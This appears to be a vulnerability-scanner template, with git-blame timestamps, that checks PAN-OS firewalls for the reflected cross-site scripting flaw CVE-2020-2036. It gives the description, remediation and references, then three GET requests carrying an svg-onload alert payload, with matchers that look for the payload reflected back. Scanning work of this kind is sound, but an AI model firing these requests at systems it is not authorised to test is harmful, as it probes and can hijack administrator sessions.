2021-02-14 20:00:21 +00:00
id : CVE-2020-2036
2022-04-22 10:38:41 +00:00
2021-02-14 20:00:21 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting
2023-07-31 23:56:42 +00:00
author : madrobot,j4vaovo
2021-09-10 11:26:40 +00:00
severity : high
2022-04-22 10:38:41 +00:00
description : |
2022-07-26 13:45:11 +00:00
PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts : PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest security patches or updates provided by Palo Alto Networks to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
2022-05-17 09:18:12 +00:00
- https://security.paloaltonetworks.com/CVE-2020-2036
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-2036
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-2036
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.00951
epss-percentile : 0.81231
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
2023-07-31 23:56:42 +00:00
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : paloaltonetworks
product : pan-os
tags : cve,cve2020,vpn,xss
2021-02-15 19:05:52 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-07-31 23:56:42 +00:00
- raw :
- |
2023-09-01 03:04:21 +00:00
GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
2023-07-31 23:56:42 +00:00
Host : {{Hostname}}
- |
2023-09-01 03:04:21 +00:00
GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
2023-07-31 23:56:42 +00:00
Host : {{Hostname}}
- |
2023-09-01 03:04:21 +00:00
GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
2023-07-31 23:56:42 +00:00
Host : {{Hostname}}
2023-07-11 19:49:27 +00:00
2021-02-14 20:00:21 +00:00
matchers-condition : and
matchers :
2023-07-31 23:56:42 +00:00
- type : dsl
dsl :
2023-09-01 03:04:21 +00:00
- "!contains(tolower(body_1), '<svg/onload=alert(document.domain)>')"
2023-07-31 23:56:42 +00:00
condition : and
2023-07-11 19:49:27 +00:00
2023-07-31 23:56:42 +00:00
- type : dsl
dsl :
2023-09-01 03:04:21 +00:00
- "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(document.domain)>')"
- "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(document.domain)>')"
2023-07-31 23:56:42 +00:00
condition : or